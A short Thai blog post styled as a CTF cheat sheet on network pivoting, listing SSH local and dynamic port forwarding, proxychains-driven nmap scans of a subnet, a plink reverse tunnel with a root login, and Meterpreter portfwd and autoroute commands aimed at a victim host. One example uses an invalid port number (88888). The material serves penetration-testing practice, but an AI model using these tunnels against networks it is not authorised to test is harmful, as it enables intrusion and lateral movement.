วันพฤหัสบดีที่ 23 พฤษภาคม พ.ศ. 2562

Network Pivoting CTF-Cheatsheet


Network pivoting


#SSH Local Port Forwarding
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
ssh j0hn@10.11.1.252 -L 88888:10.2.2.23:23
telnet localhost 88888

#SSH Dynamic Port Forwarding
ssh -f -N -D 9050 sean@10.11.1.251
proxychains nmap --top-ports=20 -sT -Pn $ip/24

#plink
plink -l root -pw password -R 3389:localhost:3389 <remote host> -P80

#Meterpreter
Port forwarding (https://www.offensive-security.com/metasploit-unleashed/portfwd/)
portfwd add -l <local port on the attacking machine (yours)> -p <victim port we want to access> -r <victim IP address>
portfwd add -l 3389 -p 3389 -r 192.168.1.99
Network pivoting (https://www.offensive-security.com/metasploit-unleashed/pivoting/)
run autoroute -h
run autoroute -s 10.1.13.0/24
run autoroute -p


ไม่มีความคิดเห็น:

แสดงความคิดเห็น